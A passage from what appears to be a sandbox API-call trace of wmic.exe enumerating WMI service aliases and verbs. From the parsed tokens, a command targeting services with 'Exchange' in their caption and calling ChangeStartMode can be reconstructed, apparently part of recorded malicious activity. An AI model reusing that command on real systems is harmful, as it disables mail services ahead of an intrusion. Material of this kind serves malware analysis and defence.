lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0116.618] lstrlenW (lpString="EXIT") returned 4 [0116.618] lstrlenW (lpString="SERVICE") returned 7 [0116.618] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0116.618] WbemLocator:IUnknown:AddRef (This=0xf034c8) returned 0x2 [0116.618] lstrlenW (lpString="/") returned 1 [0116.618] lstrlenW (lpString="SERVICE") returned 7 [0116.619] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0116.619] lstrlenW (lpString="-") returned 1 [0116.619] lstrlenW (lpString="SERVICE") returned 7 [0116.619] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0116.619] lstrlenW (lpString="CLASS") returned 5 [0116.619] lstrlenW (lpString="SERVICE") returned 7 [0116.619] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0116.619] lstrlenW (lpString="PATH") returned 4 [0116.619] lstrlenW (lpString="SERVICE") returned 7 [0116.619] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0116.619] lstrlenW (lpString="CONTEXT") returned 7 [0116.619] lstrlenW (lpString="SERVICE") returned 7 [0116.619] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0116.619] lstrlenW (lpString="SERVICE") returned 7 [0116.619] lstrlenW (lpString="SERVICE") returned 7 [0116.619] GetCurrentThreadId () returned 0xf74 [0116.619] ??0CHString@@QAE@XZ () returned 0xdaf5b0 [0116.619] WbemLocator:IWbemLocator:ConnectServer (in: This=0xf034c8, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xf207c0) returned 0x0 [0116.641] CoSetProxyBlanket (pProxy=0xf207c0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0116.641] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.641] GetCurrentThreadId () returned 0xf74 [0116.641] ??0CHString@@QAE@XZ () returned 0xdaf558 [0116.641] SysStringLen (param_1="root\\cli") returned 0x8 [0116.641] SysStringLen (param_1="\\") returned 0x1 [0116.641] SysStringLen (param_1="root\\cli\\") returned 0x9 [0116.641] SysStringLen (param_1="ms_409") returned 0x6 [0116.642] WbemLocator:IWbemLocator:ConnectServer (in: This=0xf034c8, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xf20c20) returned 0x0 [0116.648] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.648] GetCurrentThreadId () returned 0xf74 [0116.648] ??0CHString@@QAE@XZ () returned 0xdaf5b4 [0116.648] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0116.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x1158aa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0116.648] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0116.649] SysStringLen (param_1="SERVICE") returned 0x7 [0116.649] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0116.649] SysStringLen (param_1="'") returned 0x1 [0116.649] IWbemServices:GetObject (in: This=0xf207c0, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xdaf5b0*=0x0, ppCallResult=0x0 | out: ppObject=0xdaf5b0*=0xf45df0, ppCallResult=0x0) returned 0x0 [0116.656] IWbemClassObject:Get (in: This=0xf45df0, wszName="Target", lFlags=0, pVal=0xdaf588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf588*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.656] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0116.656] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0116.656] IWbemClassObject:Get (in: This=0xf45df0, wszName="PWhere", lFlags=0, pVal=0xdaf588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf588*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.656] lstrlenW (lpString="WHERE Name='#'") returned 14 [0116.656] lstrlenW (lpString="WHERE Name='#'") returned 14 [0116.656] IWbemClassObject:Get (in: This=0xf45df0, wszName="Connection", lFlags=0, pVal=0xdaf588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf588*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf461b0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.656] IUnknown:QueryInterface (in: This=0xf461b0, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xdaf5a4 | out: ppvObject=0xdaf5a4*=0xf461b0) returned 0x0 [0116.656] GetCurrentThreadId () returned 0xf74 [0116.656] ??0CHString@@QAE@XZ () returned 0xdaf524 [0116.656] IWbemClassObject:Get (in: This=0xf461b0, wszName="Namespace", lFlags=0, pVal=0xdaf508*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf508*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.656] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0116.656] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0116.656] IWbemClassObject:Get (in: This=0xf461b0, wszName="Locale", lFlags=0, pVal=0xdaf508*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf26954, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf508*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.656] lstrlenW (lpString="ms_409") returned 6 [0116.657] lstrlenW (lpString="ms_409") returned 6 [0116.657] IWbemClassObject:Get (in: This=0xf461b0, wszName="User", lFlags=0, pVal=0xdaf508*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf26954, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf508*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.657] IWbemClassObject:Get (in: This=0xf461b0, wszName="Password", lFlags=0, pVal=0xdaf508*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf508*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.657] IWbemClassObject:Get (in: This=0xf461b0, wszName="Server", lFlags=0, pVal=0xdaf508*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf508*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.657] lstrlenW (lpString=".") returned 1 [0116.657] lstrlenW (lpString=".") returned 1 [0116.657] IWbemClassObject:Get (in: This=0xf461b0, wszName="Authority", lFlags=0, pVal=0xdaf508*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf26954, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf508*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.657] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.657] IUnknown:Release (This=0xf461b0) returned 0x1 [0116.657] GetCurrentThreadId () returned 0xf74 [0116.657] ??0CHString@@QAE@XZ () returned 0xdaf514 [0116.657] IWbemClassObject:Get (in: This=0xf45df0, wszName="__RELPATH", lFlags=0, pVal=0xdaf4fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf4fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.657] GetCurrentThreadId () returned 0xf74 [0116.657] ??0CHString@@QAE@XZ () returned 0xdaf490 [0116.657] ??0CHString@@QAE@PBG@Z () returned 0xdaf48c [0116.657] ??0CHString@@QAE@ABV0@@Z () returned 0xdaf40c [0116.657] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0116.657] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x1158ae0 [0116.657] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0116.657] ?Left@CHString@@QBE?AV1@H@Z () returned 0xdaf404 [0116.657] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xdaf408 [0116.657] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xdaf48c [0116.657] ??1CHString@@QAE@XZ () returned 0x1 [0116.657] ??1CHString@@QAE@XZ () returned 0x1 [0116.657] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xdaf400 [0116.657] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xdaf40c [0116.658] ??1CHString@@QAE@XZ () returned 0x1 [0116.658] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x1158b40 [0116.658] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0116.658] ?Left@CHString@@QBE?AV1@H@Z () returned 0xdaf404 [0116.658] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xdaf408 [0116.658] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xdaf48c [0116.658] ??1CHString@@QAE@XZ () returned 0x1 [0116.658] ??1CHString@@QAE@XZ () returned 0x1 [0116.658] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xdaf400 [0116.658] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xdaf40c [0116.658] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.658] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0116.658] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.658] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0116.658] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0116.658] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0116.658] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0116.658] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0116.658] SysStringLen (param_1="\"") returned 0x1 [0116.658] IWbemServices:GetObject (in: This=0xf20c20, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xdaf49c*=0x0, ppCallResult=0x0 | out: ppObject=0xdaf49c*=0xf46590, ppCallResult=0x0) returned 0x0 [0116.660] IWbemClassObject:Get (in: This=0xf46590, wszName="Text", lFlags=0, pVal=0xdaf468*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaf468*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf300d8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xf23330, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.660] SafeArrayGetLBound (in: psa=0xf300d8, nDim=0x1, plLbound=0xdaf478 | out: plLbound=0xdaf478) returned 0x0 [0116.660] SafeArrayGetUBound (in: psa=0xf300d8, nDim=0x1, plUbound=0xdaf47c | out: plUbound=0xdaf47c) returned 0x0 [0116.660] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaf494, pv=0xdaf480 | out: pv=0xdaf480) returned 0x0 [0116.660] SysStringLen (param_1="Service application management. ") returned 0x20 [0116.660] IUnknown:Release (This=0xf46590) returned 0x0 [0116.660] ??1CHString@@QAE@XZ () returned 0x1 [0116.660] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.660] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.660] lstrlenW (lpString="Service application management. ") returned 32 [0116.660] lstrlenW (lpString="Service application management. ") returned 32 [0116.660] IUnknown:Release (This=0xf45df0) returned 0x0 [0116.661] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.661] lstrlenW (lpString="PATH") returned 4 [0116.661] lstrlenW (lpString="WHERE") returned 5 [0116.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0116.661] lstrlenW (lpString="WHERE") returned 5 [0116.661] lstrlenW (lpString="WHERE") returned 5 [0116.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0116.661] lstrlenW (lpString="/") returned 1 [0116.661] lstrlenW (lpString="caption LIKE '%Exchange%'") returned 25 [0116.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%Exchange%'", cchCount1=25, lpString2="/", cchCount2=1) returned 3 [0116.661] lstrlenW (lpString="-") returned 1 [0116.661] lstrlenW (lpString="caption LIKE '%Exchange%'") returned 25 [0116.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%Exchange%'", cchCount1=25, lpString2="-", cchCount2=1) returned 3 [0116.661] lstrlenW (lpString="caption LIKE '%Exchange%'") returned 25 [0116.661] lstrlenW (lpString="caption LIKE '%Exchange%'") returned 25 [0116.661] lstrlenW (lpString="/") returned 1 [0116.661] lstrlenW (lpString="CALL") returned 4 [0116.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0116.661] lstrlenW (lpString="-") returned 1 [0116.661] lstrlenW (lpString="CALL") returned 4 [0116.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0116.662] lstrlenW (lpString="CALL") returned 4 [0116.662] lstrlenW (lpString="CALL") returned 4 [0116.662] lstrlenW (lpString="GET") returned 3 [0116.662] lstrlenW (lpString="CALL") returned 4 [0116.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0116.662] lstrlenW (lpString="LIST") returned 4 [0116.662] lstrlenW (lpString="CALL") returned 4 [0116.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0116.662] lstrlenW (lpString="SET") returned 3 [0116.662] lstrlenW (lpString="CALL") returned 4 [0116.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0116.662] lstrlenW (lpString="CREATE") returned 6 [0116.662] lstrlenW (lpString="CALL") returned 4 [0116.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0116.662] lstrlenW (lpString="CALL") returned 4 [0116.662] lstrlenW (lpString="CALL") returned 4 [0116.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0116.662] lstrlenW (lpString="/") returned 1 [0116.662] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0116.662] lstrlenW (lpString="-") returned 1 [0116.662] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0116.662] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.662] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.662] GetCurrentThreadId () returned 0xf74 [0116.662] ??0CHString@@QAE@XZ () returned 0xdaed1c [0116.662] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0116.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x1158b98, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0116.663] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0116.663] SysStringLen (param_1="SERVICE") returned 0x7 [0116.663] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0116.663] SysStringLen (param_1="'") returned 0x1 [0116.663] IWbemServices:GetObject (in: This=0xf207c0, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xdaecf8*=0x0, ppCallResult=0x0 | out: ppObject=0xdaecf8*=0xf45df0, ppCallResult=0x0) returned 0x0 [0116.669] lstrlenW (lpString="CALL") returned 4 [0116.669] lstrlenW (lpString="CALL") returned 4 [0116.669] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0116.669] IWbemClassObject:Get (in: This=0xf45df0, wszName="Verbs", lFlags=0, pVal=0xdaecb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaecb0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf300d8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xf2ff48, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.670] SafeArrayGetLBound (in: psa=0xf300d8, nDim=0x1, plLbound=0xdaecc0 | out: plLbound=0xdaecc0) returned 0x0 [0116.670] SafeArrayGetUBound (in: psa=0xf300d8, nDim=0x1, plUbound=0xdaecc8 | out: plUbound=0xdaecc8) returned 0x0 [0116.670] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.670] IWbemClassObject:Get (in: This=0xf477b8, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.670] lstrlenW (lpString="StartService") returned 12 [0116.670] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.670] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0116.670] IUnknown:Release (This=0xf477b8) returned 0x1 [0116.670] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.670] IWbemClassObject:Get (in: This=0xf47ce8, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.670] lstrlenW (lpString="StopService") returned 11 [0116.670] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.670] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0116.670] IUnknown:Release (This=0xf47ce8) returned 0x1 [0116.670] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.670] IWbemClassObject:Get (in: This=0xf48228, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.671] lstrlenW (lpString="PauseService") returned 12 [0116.671] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0116.671] IUnknown:Release (This=0xf48228) returned 0x1 [0116.671] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.671] IWbemClassObject:Get (in: This=0xf48768, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.671] lstrlenW (lpString="ResumeService") returned 13 [0116.671] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0116.671] IUnknown:Release (This=0xf48768) returned 0x1 [0116.671] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.671] IWbemClassObject:Get (in: This=0xf48cd0, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.671] lstrlenW (lpString="InterrogateService") returned 18 [0116.671] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0116.671] IUnknown:Release (This=0xf48cd0) returned 0x1 [0116.671] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.671] IWbemClassObject:Get (in: This=0xf496d8, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.671] lstrlenW (lpString="UserControlService") returned 18 [0116.671] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0116.671] IUnknown:Release (This=0xf496d8) returned 0x1 [0116.671] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.671] IWbemClassObject:Get (in: This=0xf4d6e0, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.672] lstrlenW (lpString="Create") returned 6 [0116.672] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.672] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0116.672] IUnknown:Release (This=0xf4d6e0) returned 0x1 [0116.672] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.672] IWbemClassObject:Get (in: This=0xf513b0, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.672] lstrlenW (lpString="Change") returned 6 [0116.672] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.672] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0116.672] IUnknown:Release (This=0xf513b0) returned 0x1 [0116.672] SafeArrayGetElement (in: psa=0xf300d8, rgIndices=0xdaecd0, pv=0xdaed04 | out: pv=0xdaed04) returned 0x0 [0116.672] IWbemClassObject:Get (in: This=0xf52038, wszName="Name", lFlags=0, pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.672] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.672] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.672] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0116.672] GetCurrentThreadId () returned 0xf74 [0116.672] ??0CHString@@QAE@XZ () returned 0xdaeb1c [0116.672] IWbemClassObject:Get (in: This=0xf52038, wszName="Description", lFlags=0, pVal=0xdaeaec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeaec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.672] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.672] IWbemClassObject:Get (in: This=0xf52038, wszName="Parameters", 